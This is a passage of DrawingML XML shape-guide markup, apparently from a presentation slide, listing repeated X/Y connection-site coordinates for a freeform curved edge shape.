              <a:gd name="connsiteY77" fmla="*/ 896999 h 6858000"/>
              <a:gd name="connsiteX78" fmla="*/ 21411 w 1342163"/>
              <a:gd name="connsiteY78" fmla="*/ 821517 h 6858000"/>
              <a:gd name="connsiteX79" fmla="*/ 12141 w 1342163"/>
              <a:gd name="connsiteY79" fmla="*/ 711705 h 6858000"/>
              <a:gd name="connsiteX80" fmla="*/ 9051 w 1342163"/>
              <a:gd name="connsiteY80" fmla="*/ 619315 h 6858000"/>
              <a:gd name="connsiteX81" fmla="*/ 2707 w 1342163"/>
              <a:gd name="connsiteY81" fmla="*/ 585934 h 6858000"/>
              <a:gd name="connsiteX82" fmla="*/ 3 w 1342163"/>
              <a:gd name="connsiteY82" fmla="*/ 538948 h 6858000"/>
              <a:gd name="connsiteX83" fmla="*/ 3911 w 1342163"/>
              <a:gd name="connsiteY83" fmla="*/ 525163 h 6858000"/>
              <a:gd name="connsiteX84" fmla="*/ 29283 w 1342163"/>
              <a:gd name="connsiteY84" fmla="*/ 393828 h 6858000"/>
              <a:gd name="connsiteX85" fmla="*/ 29113 w 1342163"/>
              <a:gd name="connsiteY85" fmla="*/ 353137 h 6858000"/>
              <a:gd name="connsiteX86" fmla="*/ 34806 w 1342163"/>
              <a:gd name="connsiteY86" fmla="*/ 275771 h 6858000"/>
              <a:gd name="connsiteX87" fmla="*/ 44500 w 1342163"/>
              <a:gd name="connsiteY87" fmla="*/ 236673 h 6858000"/>
              <a:gd name="connsiteX88" fmla="*/ 43543 w 1342163"/>
              <a:gd name="connsiteY88" fmla="*/ 144983 h 6858000"/>
              <a:gd name="connsiteX89" fmla="*/ 33828 w 1342163"/>
              <a:gd name="connsiteY89" fmla="*/ 33857 h 6858000"/>
              <a:gd name="connsiteX90" fmla="*/ 15381 w 1342163"/>
              <a:gd name="connsiteY90" fmla="*/ 0 h 6858000"/>
              <a:gd name="connsiteX0" fmla="*/ 15381 w 1342163"/>
              <a:gd name="connsiteY0" fmla="*/ 0 h 6858000"/>
              <a:gd name="connsiteX1" fmla="*/ 1342163 w 1342163"/>
              <a:gd name="connsiteY1" fmla="*/ 0 h 6858000"/>
              <a:gd name="connsiteX2" fmla="*/ 1342163 w 1342163"/>
              <a:gd name="connsiteY2" fmla="*/ 6858000 h 6858000"/>
              <a:gd name="connsiteX3" fmla="*/ 78857 w 1342163"/>
              <a:gd name="connsiteY3" fmla="*/ 6857735 h 6858000"/>
              <a:gd name="connsiteX4" fmla="*/ 115450 w 1342163"/>
              <a:gd name="connsiteY4" fmla="*/ 6776847 h 6858000"/>
              <a:gd name="connsiteX5" fmla="*/ 126950 w 1342163"/>
              <a:gd name="connsiteY5" fmla="*/ 6737706 h 6858000"/>
              <a:gd name="connsiteX6" fmla="*/ 144357 w 1342163"/>
              <a:gd name="connsiteY6" fmla="*/ 6686827 h 6858000"/>
              <a:gd name="connsiteX7" fmla="*/ 155935 w 1342163"/>
              <a:gd name="connsiteY7" fmla="*/ 6633777 h 6858000"/>
              <a:gd name="connsiteX8" fmla="*/ 228778 w 1342163"/>
              <a:gd name="connsiteY8" fmla="*/ 6492130 h 6858000"/>
              <a:gd name="connsiteX9" fmla="*/ 244465 w 1342163"/>
              <a:gd name="connsiteY9" fmla="*/ 6431610 h 6858000"/>
              <a:gd name="connsiteX10" fmla="*/ 271393 w 1342163"/>
              <a:gd name="connsiteY10" fmla="*/ 6334727 h 6858000"/>
              <a:gd name="connsiteX11" fmla="*/ 263305 w 1342163"/>
              <a:gd name="connsiteY11" fmla="*/ 6294334 h 6858000"/>
              <a:gd name="connsiteX12" fmla="*/ 251079 w 1342163"/>
              <a:gd name="connsiteY12" fmla="*/ 6231403 h 6858000"/>
              <a:gd name="connsiteX13" fmla="*/ 243737 w 1342163"/>
              <a:gd name="connsiteY13" fmla="*/ 6202459 h 6858000"/>
              <a:gd name="connsiteX14" fmla="*/ 242535 w 1342163"/>
              <a:gd name="connsiteY14" fmla="*/ 6153037 h 6858000"/>
              <a:gd name="connsiteX15" fmla="*/ 255506 w 1342163"/>
              <a:gd name="connsiteY15" fmla="*/ 6061464 h 6858000"/>
              <a:gd name="connsiteX16" fmla="*/ 245337 w 1342163"/>
              <a:gd name="connsiteY16" fmla="*/ 6028119 h 6858000"/>
              <a:gd name="connsiteX17" fmla="*/ 230566 w 1342163"/>
              <a:gd name="connsiteY17" fmla="*/ 5926735 h 6858000"/>
              <a:gd name="connsiteX18" fmla="*/ 280078 w 1342163"/>
              <a:gd name="connsiteY18" fmla="*/ 5712857 h 6858000"/>
              <a:gd name="connsiteX19" fmla="*/ 309876 w 1342163"/>
              <a:gd name="connsiteY19" fmla="*/ 5660491 h 6858000"/>
              <a:gd name="connsiteX20" fmla="*/ 323888 w 1342163"/>
              <a:gd name="connsiteY20" fmla="*/ 5553910 h 6858000"/>
              <a:gd name="connsiteX21" fmla="*/ 348319 w 1342163"/>
              <a:gd name="connsiteY21" fmla="*/ 5449031 h 6858000"/>
              <a:gd name="connsiteX22" fmla="*/ 359443 w 1342163"/>
              <a:gd name="connsiteY22" fmla="*/ 5396260 h 6858000"/>
              <a:gd name="connsiteX23" fmla="*/ 385202 w 1342163"/>
              <a:gd name="connsiteY23" fmla="*/ 5341916 h 6858000"/>
              <a:gd name="connsiteX24" fmla="*/ 423583 w 1342163"/>
              <a:gd name="connsiteY24" fmla="*/ 5264214 h 6858000"/>
              <a:gd name="connsiteX25" fmla="*/ 429742 w 1342163"/>
              <a:gd name="connsiteY25" fmla="*/ 5225268 h 6858000"/>
              <a:gd name="connsiteX26" fmla="*/ 438024 w 1342163"/>
              <a:gd name="connsiteY26" fmla="*/ 5159961 h 6858000"/>
              <a:gd name="connsiteX27" fmla="*/ 441634 w 1342163"/>
              <a:gd name="connsiteY27" fmla="*/ 5125185 h 6858000"/>
              <a:gd name="connsiteX28" fmla="*/ 455500 w 1342163"/>
              <a:gd name="connsiteY28" fmla="*/ 5067850 h 6858000"/>
              <a:gd name="connsiteX29" fmla="*/ 458231 w 1342163"/>
              <a:gd name="connsiteY29" fmla="*/ 5060861 h 6858000"/>
              <a:gd name="connsiteX30" fmla="*/ 456489 w 1342163"/>
              <a:gd name="connsiteY30" fmla="*/ 4993030 h 6858000"/>
              <a:gd name="connsiteX31" fmla="*/ 463398 w 1342163"/>
              <a:gd name="connsiteY31" fmla="*/ 4946844 h 6858000"/>
              <a:gd name="connsiteX32" fmla="*/ 474657 w 1342163"/>
              <a:gd name="connsiteY32" fmla="*/ 4858827 h 6858000"/>
              <a:gd name="connsiteX33" fmla="*/ 480560 w 1342163"/>
              <a:gd name="connsiteY33" fmla="*/ 4821170 h 6858000"/>
              <a:gd name="connsiteX34" fmla="*/ 484393 w 1342163"/>
              <a:gd name="connsiteY34" fmla="*/ 4690749 h 6858000"/>
              <a:gd name="connsiteX35" fmla="*/ 479873 w 1342163"/>
              <a:gd name="connsiteY35" fmla="*/ 4584173 h 6858000"/>
              <a:gd name="connsiteX36" fmla="*/ 474956 w 1342163"/>
              <a:gd name="connsiteY36" fmla="*/ 4444346 h 6858000"/>
              <a:gd name="connsiteX37" fmla="*/ 471521 w 1342163"/>
              <a:gd name="connsiteY37" fmla="*/ 4375228 h 6858000"/>
              <a:gd name="connsiteX38" fmla="*/ 452174 w 1342163"/>
              <a:gd name="connsiteY38" fmla="*/ 4214165 h 6858000"/>
              <a:gd name="connsiteX39" fmla="*/ 453803 w 1342163"/>
              <a:gd name="connsiteY39" fmla="*/ 4076008 h 6858000"/>
              <a:gd name="connsiteX40" fmla="*/ 441503 w 1342163"/>
              <a:gd name="connsiteY40" fmla="*/ 4033999 h 6858000"/>
              <a:gd name="connsiteX41" fmla="*/ 441228 w 1342163"/>
              <a:gd name="connsiteY41" fmla="*/ 4013953 h 6858000"/>
              <a:gd name="connsiteX42" fmla="*/ 433306 w 1342163"/>
              <a:gd name="connsiteY42" fmla="*/ 3901461 h 6858000"/>
              <a:gd name="connsiteX43" fmla="*/ 455900 w 1342163"/>
              <a:gd name="connsiteY43" fmla="*/ 3813873 h 6858000"/>
              <a:gd name="connsiteX44" fmla="*/ 466796 w 1342163"/>
              <a:gd name="connsiteY44" fmla="*/ 3738082 h 6858000"/>
              <a:gd name="connsiteX45" fmla="*/ 474142 w 1342163"/>
              <a:gd name="connsiteY45" fmla="*/ 3673397 h 6858000"/>
              <a:gd name="connsiteX46" fmla="*/ 473438 w 1342163"/>
              <a:gd name="connsiteY46" fmla="*/ 3637109 h 6858000"/>
              <a:gd name="connsiteX47" fmla="*/ 476881 w 1342163"/>
              <a:gd name="connsiteY47" fmla="*/ 3536883 h 6858000"/>
              <a:gd name="connsiteX48" fmla="*/ 484419 w 1342163"/>
              <a:gd name="connsiteY48" fmla="*/ 3435652 h 6858000"/>
              <a:gd name="connsiteX49" fmla="*/ 498311 w 1342163"/>
              <a:gd name="connsiteY49" fmla="*/ 3295862 h 6858000"/>
              <a:gd name="connsiteX50" fmla="*/ 480837 w 1342163"/>
              <a:gd name="connsiteY50" fmla="*/ 3158586 h 6858000"/>
              <a:gd name="connsiteX51" fmla="*/ 456245 w 1342163"/>
              <a:gd name="connsiteY51" fmla="*/ 3112365 h 6858000"/>
              <a:gd name="connsiteX52" fmla="*/ 441720 w 1342163"/>
              <a:gd name="connsiteY52" fmla="*/ 3072935 h 6858000"/>
              <a:gd name="connsiteX53" fmla="*/ 416894 w 1342163"/>
              <a:gd name="connsiteY53" fmla="*/ 2958185 h 6858000"/>
              <a:gd name="connsiteX54" fmla="*/ 374174 w 1342163"/>
              <a:gd name="connsiteY54" fmla="*/ 2843952 h 6858000"/>
              <a:gd name="connsiteX55" fmla="*/ 308426 w 1342163"/>
              <a:gd name="connsiteY55" fmla="*/ 2554718 h 6858000"/>
              <a:gd name="connsiteX56" fmla="*/ 279243 w 1342163"/>
              <a:gd name="connsiteY56" fmla="*/ 2447068 h 6858000"/>
              <a:gd name="connsiteX57" fmla="*/ 283313 w 1342163"/>
              <a:gd name="connsiteY57" fmla="*/ 2423438 h 6858000"/>
              <a:gd name="connsiteX58" fmla="*/ 272203 w 1342163"/>
              <a:gd name="connsiteY58" fmla="*/ 2402874 h 6858000"/>
              <a:gd name="connsiteX59" fmla="*/ 251144 w 1342163"/>
              <a:gd name="connsiteY59" fmla="*/ 2261920 h 6858000"/>
              <a:gd name="connsiteX60" fmla="*/ 241031 w 1342163"/>
              <a:gd name="connsiteY60" fmla="*/ 2195378 h 6858000"/>
              <a:gd name="connsiteX61" fmla="*/ 225248 w 1342163"/>
              <a:gd name="connsiteY61" fmla="*/ 2155135 h 6858000"/>
              <a:gd name="connsiteX62" fmla="*/ 222706 w 1342163"/>
              <a:gd name="connsiteY62" fmla="*/ 2118008 h 6858000"/>
              <a:gd name="connsiteX63" fmla="*/ 223699 w 1342163"/>
              <a:gd name="connsiteY63" fmla="*/ 2050531 h 6858000"/>
              <a:gd name="connsiteX64" fmla="*/ 196683 w 1342163"/>
              <a:gd name="connsiteY64" fmla="*/ 1906352 h 6858000"/>
              <a:gd name="connsiteX65" fmla="*/ 173240 w 1342163"/>
              <a:gd name="connsiteY65" fmla="*/ 1861531 h 6858000"/>
              <a:gd name="connsiteX66" fmla="*/ 127039 w 1342163"/>
              <a:gd name="connsiteY66" fmla="*/ 1732919 h 6858000"/>
              <a:gd name="connsiteX67" fmla="*/ 98476 w 1342163"/>
              <a:gd name="connsiteY67" fmla="*/ 1615777 h 6858000"/>
              <a:gd name="connsiteX68" fmla="*/ 79271 w 1342163"/>
              <a:gd name="connsiteY68" fmla="*/ 1563678 h 6858000"/>
              <a:gd name="connsiteX69" fmla="*/ 85093 w 1342163"/>
              <a:gd name="connsiteY69" fmla="*/ 1477995 h 6858000"/>
              <a:gd name="connsiteX70" fmla="*/ 71178 w 1342163"/>
              <a:gd name="connsiteY70" fmla="*/ 1373769 h 6858000"/>
              <a:gd name="connsiteX71" fmla="*/ 79485 w 1342163"/>
              <a:gd name="connsiteY71" fmla="*/ 1307086 h 6858000"/>
              <a:gd name="connsiteX72" fmla="*/ 85358 w 1342163"/>
              <a:gd name="connsiteY72" fmla="*/ 1168288 h 6858000"/>
              <a:gd name="connsiteX73" fmla="*/ 66946 w 1342163"/>
              <a:gd name="connsiteY73" fmla="*/ 1088484 h 6858000"/>
              <a:gd name="connsiteX74" fmla="*/ 55682 w 1342163"/>
              <a:gd name="connsiteY74" fmla="*/ 1016103 h 6858000"/>
              <a:gd name="connsiteX75" fmla="*/ 57138 w 1342163"/>
              <a:gd name="connsiteY75" fmla="*/ 954054 h 6858000"/>
              <a:gd name="connsiteX76" fmla="*/ 52003 w 1342163"/>
              <a:gd name="connsiteY76" fmla="*/ 896999 h 6858000"/>
              <a:gd name="connsiteX77" fmla="*/ 21411 w 1342163"/>
              <a:gd name="connsiteY77" fmla="*/ 821517 h 6858000"/>
              <a:gd name="connsiteX78" fmla="*/ 12141 w 1342163"/>
              <a:gd name="connsiteY78" fmla="*/ 711705 h 6858000"/>
              <a:gd name="connsiteX79" fmla="*/ 9051 w 1342163"/>
              <a:gd name="connsiteY79" fmla="*/ 619315 h 6858000"/>
              <a:gd name="connsiteX80" fmla="*/ 2707 w 1342163"/>
              <a:gd name="connsiteY80" fmla="*/ 585934 h 6858000"/>
              <a:gd name="connsiteX81" fmla="*/ 3 w 1342163"/>
              <a:gd name="connsiteY81" fmla="*/ 538948 h 6858000"/>
              <a:gd name="connsiteX82" fmla="*/ 3911 w 1342163"/>
              <a:gd name="connsiteY82" fmla="*/ 525163 h 6858000"/>
              <a:gd name="connsiteX83" fmla="*/ 29283 w 1342163"/>
              <a:gd name="connsiteY83" fmla="*/ 393828 h 6858000"/>
              <a:gd name="connsiteX84" fmla="*/ 29113 w 1342163"/>
              <a:gd name="connsiteY84" fmla="*/ 353137 h 6858000"/>
              <a:gd name="connsiteX85" fmla="*/ 34806 w 1342163"/>
              <a:gd name="connsiteY85" fmla="*/ 275771 h 6858000"/>
              <a:gd name="connsiteX86" fmla="*/ 44500 w 1342163"/>
              <a:gd name="connsiteY86" fmla="*/ 236673 h 6858000"/>
              <a:gd name="connsiteX87" fmla="*/ 43543 w 1342163"/>
              <a:gd name="connsiteY87" fmla="*/ 144983 h 6858000"/>
              <a:gd name="connsiteX88" fmla="*/ 33828 w 1342163"/>
              <a:gd name="connsiteY88" fmla="*/ 33857 h 6858000"/>
              <a:gd name="connsiteX89" fmla="*/ 15381 w 1342163"/>
              <a:gd name="connsiteY89" fmla="*/ 0 h 6858000"/>
              <a:gd name="connsiteX0" fmla="*/ 15381 w 1342163"/>
              <a:gd name="connsiteY0" fmla="*/ 0 h 6858000"/>
              <a:gd name="connsiteX1" fmla="*/ 1342163 w 1342163"/>
              <a:gd name="connsiteY1" fmla="*/ 0 h 6858000"/>
              <a:gd name="connsiteX2" fmla="*/ 1342163 w 1342163"/>
              <a:gd name="connsiteY2" fmla="*/ 6858000 h 6858000"/>
              <a:gd name="connsiteX3" fmla="*/ 78857 w 1342163"/>
              <a:gd name="connsiteY3" fmla="*/ 6857735 h 6858000"/>
              <a:gd name="connsiteX4" fmla="*/ 115450 w 1342163"/>
              <a:gd name="connsiteY4" fmla="*/ 6776847 h 6858000"/>
              <a:gd name="connsiteX5" fmla="*/ 126950 w 1342163"/>
              <a:gd name="connsiteY5" fmla="*/ 6737706 h 6858000"/>
              <a:gd name="connsiteX6" fmla="*/ 144357 w 1342163"/>
              <a:gd name="connsiteY6" fmla="*/ 6686827 h 6858000"/>
              <a:gd name="connsiteX7" fmla="*/ 155935 w 1342163"/>
              <a:gd name="connsiteY7" fmla="*/ 6633777 h 6858000"/>
              <a:gd name="connsiteX8" fmla="*/ 228778 w 1342163"/>
              <a:gd name="connsiteY8" fmla="*/ 6492130 h 6858000"/>
              <a:gd name="connsiteX9" fmla="*/ 244465 w 1342163"/>
              <a:gd name="connsiteY9" fmla="*/ 6431610 h 6858000"/>
              <a:gd name="connsiteX10" fmla="*/ 271393 w 1342163"/>
              <a:gd name="connsiteY10" fmla="*/ 6334727 h 6858000"/>
              <a:gd name="connsiteX11" fmla="*/ 263305 w 1342163"/>
              <a:gd name="connsiteY11" fmla="*/ 6294334 h 6858000"/>
              <a:gd name="connsiteX12" fmla="*/ 251079 w 1342163"/>
              <a:gd name="connsiteY12" fmla="*/ 6231403 h 6858000"/>
              <a:gd name="connsiteX13" fmla="*/ 243737 w 1342163"/>
              <a:gd name="connsiteY13" fmla="*/ 6202459 h 6858000"/>
              <a:gd name="connsiteX14" fmla="*/ 242535 w 1342163"/>
              <a:gd name="connsiteY14" fmla="*/ 6153037 h 6858000"/>
              <a:gd name="connsiteX15" fmla="*/ 255506 w 1342163"/>
              <a:gd name="connsiteY15" fmla="*/ 6061464 h 6858000"/>
              <a:gd name="connsiteX16" fmla="*/ 245337 w 1342163"/>
              <a:gd name="connsiteY16" fmla="*/ 6028119 h 6858000"/>
              <a:gd name="connsiteX17" fmla="*/ 230566 w 1342163"/>
              <a:gd name="connsiteY17" fmla="*/ 5926735 h 6858000"/>
              <a:gd name="connsiteX18" fmla="*/ 280078 w 1342163"/>
              <a:gd name="connsiteY18" fmla="*/ 5712857 h 6858000"/>
              <a:gd name="connsiteX19" fmla="*/ 309876 w 1342163"/>
              <a:gd name="connsiteY19" fmla="*/ 5660491 h 6858000"/>
              <a:gd name="connsiteX20" fmla="*/ 323888 w 1342163"/>
              <a:gd name="connsiteY20" fmla="*/ 5553910 h 6858000"/>
              <a:gd name="connsiteX21" fmla="*/ 348319 w 1342163"/>
              <a:gd name="connsiteY21" fmla="*/ 5449031 h 6858000"/>
              <a:gd name="connsiteX22" fmla="*/ 359443 w 1342163"/>
              <a:gd name="connsiteY22" fmla="*/ 5396260 h 6858000"/>
              <a:gd name="connsiteX23" fmla="*/ 385202 w 1342163"/>
              <a:gd name="connsiteY23" fmla="*/ 5341916 h 6858000"/>
              <a:gd name="connsiteX24" fmla="*/ 423583 w 1342163"/>
              <a:gd name="connsiteY24" fmla="*/ 5264214 h 6858000"/>
              <a:gd name="connsiteX25" fmla="*/ 429742 w 1342163"/>
              <a:gd name="connsiteY25" fmla="*/ 5225268 h 6858000"/>
              <a:gd name="connsiteX26" fmla="*/ 438024 w 1342163"/>
              <a:gd name="connsiteY26" fmla="*/ 5159961 h 6858000"/>
              <a:gd name="connsiteX27" fmla="*/ 441634 w 1342163"/>
              <a:gd name="connsiteY27" fmla="*/ 5125185 h 6858000"/>
              <a:gd name="connsiteX28" fmla="*/ 455500 w 1342163"/>
              <a:gd name="connsiteY28" fmla="*/ 5067850 h 6858000"/>
              <a:gd name="connsiteX29" fmla="*/ 458231 w 1342163"/>
              <a:gd name="connsiteY29" fmla="*/ 5060861 h 6858000"/>
              <a:gd name="connsiteX30" fmla="*/ 456489 w 1342163"/>
              <a:gd name="connsiteY30" fmla="*/ 4993030 h 6858000"/>
              <a:gd name="connsiteX31" fmla="*/ 463398 w 1342163"/>
              <a:gd name="connsiteY31" fmla="*/ 4946844 h 6858000"/>
              <a:gd name="connsiteX32" fmla="*/ 474657 w 1342163"/>
              <a:gd name="connsiteY32" fmla="*/ 4858827 h 6858000"/>
              <a:gd name="connsiteX33" fmla="*/ 480560 w 1342163"/>
              <a:gd name="connsiteY33" fmla="*/ 4821170 h 6858000"/>
              <a:gd name="connsiteX34" fmla="*/ 484393 w 1342163"/>
              <a:gd name="connsiteY34" fmla="*/ 4690749 h 6858000"/>
              <a:gd name="connsiteX35" fmla="*/ 479873 w 1342163"/>
              <a:gd name="connsiteY35" fmla="*/ 4584173 h 6858000"/>
              <a:gd name="connsiteX36" fmla="*/ 471521 w 1342163"/>
              <a:gd name="connsiteY36" fmla="*/ 4375228 h 6858000"/>
              <a:gd name="connsiteX37" fmla="*/ 452174 w 1342163"/>
              <a:gd name="connsiteY37" fmla="*/ 4214165 h 6858000"/>
              <a:gd name="connsiteX38" fmla="*/ 453803 w 1342163"/>
              <a:gd name="connsiteY38" fmla="*/ 4076008 h 6858000"/>
              <a:gd name="connsiteX39" fmla="*/ 441503 w 1342163"/>
              <a:gd name="connsiteY39" fmla="*/ 4033999 h 6858000"/>
              <a:gd name="connsiteX40" fmla="*/ 441228 w 1342163"/>
              <a:gd name="connsiteY40" fmla="*/ 4013953 h 6858000"/>
              <a:gd name="connsiteX41" fmla="*/ 433306 w 1342163"/>
              <a:gd name="connsiteY41" fmla="*/ 3901461 h 6858000"/>
              <a:gd name="connsiteX42" fmla="*/ 455900 w 1342163"/>
              <a:gd name="connsiteY42" fmla="*/ 3813873 h 6858000"/>
              <a:gd name="connsiteX43" fmla="*/ 466796 w 1342163"/>
              <a:gd name="connsiteY43" fmla="*/ 3738082 h 6858000"/>
              <a:gd name="connsiteX44" fmla="*/ 474142 w 1342163"/>
              <a:gd name="connsiteY44" fmla="*/ 3673397 h 6858000"/>
              <a:gd name="connsiteX45" fmla="*/ 473438 w 1342163"/>
              <a:gd name="connsiteY45" fmla="*/ 3637109 h 6858000"/>
              <a:gd name="connsiteX46" fmla="*/ 476881 w 1342163"/>
              <a:gd name="connsiteY46" fmla="*/ 3536883 h 6858000"/>
              <a:gd name="connsiteX47" fmla="*/ 484419 w 1342163"/>
              <a:gd name="connsiteY47" fmla="*/ 3435652 h 6858000"/>
              <a:gd name="connsiteX48" fmla="*/ 498311 w 1342163"/>
              <a:gd name="connsiteY48" fmla="*/ 3295862 h 6858000"/>
              <a:gd name="connsiteX49" fmla="*/ 480837 w 1342163"/>
              <a:gd name="connsiteY49" fmla="*/ 3158586 h 6858000"/>
              <a:gd name="connsiteX50" fmla="*/ 456245 w 1342163"/>
              <a:gd name="connsiteY50" fmla="*/ 3112365 h 6858000"/>
              <a:gd name="connsiteX51" fmla="*/ 441720 w 1342163"/>
              <a:gd name="connsiteY51" fmla="*/ 3072935 h 6858000"/>
              <a:gd name="connsiteX52" fmla="*/ 416894 w 1342163"/>
              <a:gd name="connsiteY52" fmla="*/ 2958185 h 6858000"/>
              <a:gd name="connsiteX53" fmla="*/ 374174 w 1342163"/>
              <a:gd name="connsiteY53" fmla="*/ 2843952 h 6858000"/>
              <a:gd name="connsiteX54" fmla="*/ 308426 w 1342163"/>
              <a:gd name="connsiteY54" fmla="*/ 2554718 h 6858000"/>
              <a:gd name="connsiteX55" fmla="*/ 279243 w 1342163"/>
              <a:gd name="connsiteY55" fmla="*/ 2447068 h 6858000"/>
              <a:gd name="connsiteX56" fmla="*/ 283313 w 1342163"/>
              <a:gd name="connsiteY56" fmla="*/ 2423438 h 6858000"/>
              <a:gd name="connsiteX57" fmla="*/ 272203 w 1342163"/>
              <a:gd name="connsiteY57" fmla="*/ 2402874 h 6858000"/>
              <a:gd name="connsiteX58" fmla="*/ 251144 w 1342163"/>
              <a:gd name="connsiteY58" fmla="*/ 2261920 h 6858000"/>
              <a:gd name="connsiteX59" fmla="*/ 241031 w 1342163"/>
              <a:gd name="connsiteY59" fmla="*/ 2195378 h 6858000"/>
              <a:gd name="connsiteX60" fmla="*/ 225248 w 1342163"/>
              <a:gd name="connsiteY60" fmla="*/ 2155135 h 6858000"/>
              <a:gd name="connsiteX61" fmla="*/ 222706 w 1342163"/>
              <a:gd name="connsiteY61" fmla="*/ 2118008 h 6858000"/>
              <a:gd name="connsiteX62" fmla="*/ 223699 w 1342163"/>
              <a:gd name="connsiteY62" fmla="*/ 2050531 h 6858000"/>
              <a:gd name="connsiteX63" fmla="*/ 196683 w 1342163"/>
              <a:gd name="connsiteY63" fmla="*/ 1906352 h 6858000"/>
              <a:gd name="connsiteX64" fmla="*/ 173240 w 1342163"/>
              <a:gd name="connsiteY64" fmla="*/ 1861531 h 6858000"/>
              <a:gd name="connsiteX65" fmla="*/ 127039 w 1342163"/>
              <a:gd name="connsiteY65" fmla="*/ 1732919 h 6858000"/>
              <a:gd name="connsiteX66" fmla="*/ 98476 w 1342163"/>
              <a:gd name="connsiteY66" fmla="*/ 1615777 h 6858000"/>
              <a:gd name="connsiteX67" fmla="*/ 79271 w 1342163"/>
              <a:gd name="connsiteY67" fmla="*/ 1563678 h 6858000"/>
              <a:gd name="connsiteX68" fmla="*/ 85093 w 1342163"/>
              <a:gd name="connsiteY68" fmla="*/ 1477995 h 6858000"/>
              <a:gd name="connsiteX69" fmla="*/ 71178 w 1342163"/>
              <a:gd name="connsiteY69" fmla="*/ 1373769 h 6858000"/>
              <a:gd name="connsiteX70" fmla="*/ 79485 w 1342163"/>
              <a:gd name="connsiteY70" fmla="*/ 1307086 h 6858000"/>
              <a:gd name="connsiteX71" fmla="*/ 85358 w 1342163"/>
              <a:gd name="connsiteY71" fmla="*/ 1168288 h 6858000"/>
              <a:gd name="connsiteX72" fmla="*/ 66946 w 1342163"/>
              <a:gd name="connsiteY72" fmla="*/ 1088484 h 6858000"/>
              <a:gd name="connsiteX73" fmla="*/ 55682 w 1342163"/>
              <a:gd name="connsiteY73" fmla="*/ 1016103 h 6858000"/>
              <a:gd name="connsiteX74" fmla="*/ 57138 w 1342163"/>
              <a:gd name="connsiteY74" fmla="*/ 954054 h 6858000"/>
              <a:gd name="connsiteX75" fmla="*/ 52003 w 1342163"/>
              <a:gd name="connsiteY75" fmla="*/ 896999 h 6858000"/>
              <a:gd name="connsiteX76" fmla="*/ 21411 w 1342163"/>
              <a:gd name="connsiteY76" fmla="*/ 821517 h 6858000"/>
              <a:gd name="connsiteX77" fmla="*/ 12141 w 1342163"/>
              <a:gd name="connsiteY77" fmla="*/ 711705 h 6858000"/>
              <a:gd name="connsiteX78" fmla="*/ 9051 w 1342163"/>
              <a:gd name="connsiteY78" fmla="*/ 619315 h 6858000"/>
              <a:gd name="connsiteX79" fmla="*/ 2707 w 1342163"/>
              <a:gd name="connsiteY79" fmla="*/ 585934 h 6858000"/>
              <a:gd name="connsiteX80" fmla="*/ 3 w 1342163"/>
              <a:gd name="connsiteY80" fmla="*/ 538948 h 6858000"/>
              <a:gd name="connsiteX81" fmla="*/ 3911 w 1342163"/>
              <a:gd name="connsiteY81" fmla="*/ 525163 h 6858000"/>
              <a:gd name="connsiteX82" fmla="*/ 29283 w 1342163"/>
              <a:gd name="connsiteY82" fmla="*/ 393828 h 6858000"/>
              <a:gd name="connsiteX83" fmla="*/ 29113 w 1342163"/>
              <a:gd name="connsiteY83" fmla="*/ 353137 h 6858000"/>
              <a:gd name="connsiteX84" fmla="*/ 34806 w 1342163"/>
              <a:gd name="connsiteY84" fmla="*/ 275771 h 6858000"/>
              <a:gd name="connsiteX85" fmla="*/ 44500 w 1342163"/>
              <a:gd name="connsiteY85" fmla="*/ 236673 h 6858000"/>
              <a:gd name="connsiteX86" fmla="*/ 43543 w 1342163"/>
              <a:gd name="connsiteY86" fmla="*/ 144983 h 6858000"/>
              <a:gd name="connsiteX87" fmla="*/ 33828 w 1342163"/>
              <a:gd name="connsiteY87" fmla="*/ 33857 h 6858000"/>
              <a:gd name="connsiteX88" fmla="*/ 15381 w 1342163"/>
              <a:gd name="connsiteY88" fmla="*/ 0 h 6858000"/>
              <a:gd name="connsiteX0" fmla="*/ 15381 w 1342163"/>
              <a:gd name="connsiteY0" fmla="*/ 0 h 6858000"/>
              <a:gd name="connsiteX1" fmla="*/ 1342163 w 1342163"/>
              <a:gd name="connsiteY1" fmla="*/ 0 h 6858000"/>
              <a:gd name="connsiteX2" fmla="*/ 1342163 w 1342163"/>
              <a:gd name="connsiteY2" fmla="*/ 6858000 h 6858000"/>
              <a:gd name="connsiteX3" fmla="*/ 78857 w 1342163"/>
              <a:gd name="connsiteY3" fmla="*/ 6857735 h 6858000"/>
              <a:gd name="connsiteX4" fmla="*/ 115450 w 1342163"/>
              <a:gd name="connsiteY4" fmla="*/ 6776847 h 6858000"/>
              <a:gd name="connsiteX5" fmla="*/ 126950 w 1342163"/>
              <a:gd name="connsiteY5" fmla="*/ 6737706 h 6858000"/>
              <a:gd name="connsiteX6" fmla="*/ 144357 w 1342163"/>
              <a:gd name="connsiteY6" fmla="*/ 6686827 h 6858000"/>
              <a:gd name="connsiteX7" fmla="*/ 155935 w 1342163"/>
              <a:gd name="connsiteY7" fmla="*/ 6633777 h 6858000"/>
              <a:gd name="connsiteX8" fmla="*/ 228778 w 1342163"/>
              <a:gd name="connsiteY8" fmla="*/ 6492130 h 6858000"/>
              <a:gd name="connsiteX9" fmla="*/ 244465 w 1342163"/>
              <a:gd name="connsiteY9" fmla="*/ 6431610 h 6858000"/>
              <a:gd name="connsiteX10" fmla="*/ 271393 w 1342163"/>
              <a:gd name="connsiteY10" fmla="*/ 6334727 h 6858000"/>
              <a:gd name="connsiteX11" fmla="*/ 263305 w 1342163"/>
              <a:gd name="connsiteY11" fmla="*/ 6294334 h 6858000"/>
              <a:gd name="connsiteX12" fmla="*/ 251079 w 1342163"/>
              <a:gd name="connsiteY12" fmla="*/ 6231403 h 6858000"/>
              <a:gd name="connsiteX13" fmla="*/ 243737 w 1342163"/>
              <a:gd name="connsiteY13" fmla="*/ 6202459 h 6858000"/>
              <a:gd name="connsiteX14" fmla="*/ 242535 w 1342163"/>
              <a:gd name="connsiteY14" fmla="*/ 6153037 h 6858000"/>
              <a:gd name="connsiteX15" fmla="*/ 255506 w 1342163"/>
              <a:gd name="connsiteY15" fmla="*/ 6061464 h 6858000"/>
              <a:gd name="connsiteX16" fmla="*/ 245337 w 1342163"/>
              <a:gd name="connsiteY16" fmla="*/ 6028119 h 6858000"/>
              <a:gd name="connsiteX17" fmla="*/ 230566 w 1342163"/>
              <a:gd name="connsiteY17" fmla="*/ 5926735 h 6858000"/>
              <a:gd name="connsiteX18" fmla="*/ 280078 w 1342163"/>
              <a:gd name="connsiteY18" fmla="*/ 5712857 h 6858000"/>
              <a:gd name="connsiteX19" fmla="*/ 309876 w 1342163"/>
